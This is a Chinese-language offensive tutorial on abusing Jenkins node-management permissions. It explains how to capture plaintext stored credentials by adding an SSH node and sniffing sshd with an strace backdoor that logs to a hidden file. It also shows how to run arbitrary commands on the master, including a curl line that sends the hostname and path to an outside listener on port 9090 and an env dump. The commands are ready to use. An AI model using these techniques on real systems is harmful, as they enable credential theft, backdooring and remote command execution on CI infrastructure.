擁有Jenkins agent權(quán)限的賬號(hào)可以對(duì)node節(jié)點(diǎn)進(jìn)行操作，通過(guò)添加不同的node可以讓流水線項(xiàng)目在不同的節(jié)點(diǎn)上運(yùn)行，安裝Jenkins的主機(jī)默認(rèn)作為master節(jié)點(diǎn)。

1.Jenkins 添加node獲取明文憑據(jù)

通過(guò)添加node節(jié)點(diǎn)，本地監(jiān)聽ssh認(rèn)證，選則憑據(jù)（明文）進(jìn)行ssh認(rèn)證，拿到密碼。

1.新建節(jié)點(diǎn)-manage nodes功能

2.填寫工作目錄，選擇通過(guò)SSH進(jìn)行遠(yuǎn)程節(jié)點(diǎn)身份認(rèn)證，選擇抓取帶*號(hào)的憑據(jù)，host key選擇不進(jìn)行驗(yàn)證：

3.主機(jī)監(jiān)聽：這里監(jiān)聽主機(jī)ssh使用的是strace后門，實(shí)際也可以使用其他方式進(jìn)行：

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)

4.保存節(jié)點(diǎn)配置， Jenkins將對(duì)主機(jī)進(jìn)行ssh請(qǐng)求：

node節(jié)點(diǎn)認(rèn)證日志（賬號(hào)密碼方式）：

5. 查看接受結(jié)果，這種方式獲得的密碼需要自行判斷下起始位置

grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

2.通過(guò)添加節(jié)點(diǎn)執(zhí)行命令

同樣的，在添加節(jié)點(diǎn)時(shí)可以配置在master上執(zhí)行命令去進(jìn)行其他節(jié)點(diǎn)認(rèn)證，也就可以在master上執(zhí)行惡意命令了。

注意：這里執(zhí)行curl命令時(shí)不能使用``直接執(zhí)行系統(tǒng)命令，所以利用時(shí)需要更換其他方式。

curl -k ip:9090/`hostname`/`pwd`
env

添加節(jié)點(diǎn)時(shí)也可以從控制器執(zhí)行命令，Launch method 選擇 通過(guò)在master上執(zhí)行命令的方式：

保存然后launch agent：

可以在Log里面看到命令env的輸出：